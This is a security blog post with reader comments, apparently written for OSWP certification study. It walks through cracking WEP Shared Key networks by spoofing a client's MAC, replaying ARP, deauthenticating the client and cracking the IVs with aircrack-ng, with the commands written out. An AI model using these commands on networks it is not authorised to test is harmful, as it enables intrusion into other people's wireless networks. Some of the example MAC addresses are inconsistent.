Access Points that use WEP encryption are easy to pwn. The matter comes a little more complicated when the same APs use Shared Key as the authentication method. The instructions you find on the internet tell you that you need to deauthenticate a connected client from the AP after running airodump-ng and that with this operation you will get a .xor file containing the PGRA key to continue the attack (e.g. using the xor file to forge an ARP packet with packetforge-ng and using the interactive packet replay option of aireplay-ng). The worse thing is that this method, more often than not, does not work and the only thing you will get from airodump-ng is the message Broken SKA in the upper right corner. The reason it doesn’t work is that hardware manufacturers modify the 802.11 frame and airodump-ng doesn’t interpret it in the correct way.
How do we bypass this? One way I found is using the connected client by spoofing it’s mac address to conduct the attack. What we do is simply change our mac address to the one of the connected client and use an ARP request replay attack. To get a quick ARP packet we deauthenticate the legal client from the AP forcing it to reconnect and generate a new ARP request. In the following line you will find the commands you need to use. We are assuming that the AP is on channel 3 and that AP and client have respectively mac address AA:AA::AAAA:AA:AA: and CC:CC:CC:CC:CC:CC
- create the monitor interface on the correct channel
airmon-ng start wlan0 3 - spoof the mac address of the mon0 interface to reflect the one of the connected client
ifconfig mon0 down
macchanger –mac CC:CC:CC:CC:CC:CC mon0
ifconfig mon0 up
- run airodump to capture packets
airodump-ng –channel 3 -w SKA –bssid AA:AA:AA:AA:AA:AA mon0 - launch the arp repaly attack with aireplay-ng
aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0 - deauthenticate the connected client to generate an ARP request
aireplay-ng -0 1 -a C0:C1:C0:C3:3C:41 -c d8:30:62:9e:55:92 mon0
After this the data counter in airodump-ng will start growing and it will collect ivs that you can use to crack the WEP key with aircrack-ng.
Here you can find a video of the entire procedure on Securitytube.net
6 Responses to Defeating “Broken SKA” in WEP Shared Key Authentication attacks
Leave a Reply
LICENSE
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Keep in contact
Follow me on Twitter
Follow me on Google+
Hi albatr0ss,
thanks for the demo in getting around the broken SKA. My previous lab did not get a XOR file due to broken SKA. You watched securitytube as well? Vivek rocks.
I have signed up for OSWP, have you already started the lesson?
sirbowen
Hi,
yes I did the previous version of OSWP (http://www.albatr0ss.it/2011/09/24/certificazione-oswp-il-wifu-di-backtrack/). In the very near future the new version will be available (http://www.offensive-security.com/offsec/offensive-security-wireless-attacks-updated/).
Yes Vivek rocks!
I found that this method does not work with every card…this method worked great with my old intel wireless card…but it does not work well with TP-Link adapter…I will get an alfa card and try with the deauthentication again….also alfa card is great for doing airbase-ng :p
I passed the OSWP
I just received the confirmation email today.
If the AP with SKA is already outputting enough #Data packets (like 10 to 50 per second) I do not necessarely need to use this am I right?
I attempted this and was still unsuccessful. On thing I have just noticed is that I neglected to run the arp replay attack before de-authing the client.
Would not performing the arp replay first affect my ability to capture the handshake?
Any input is greatly appreciated!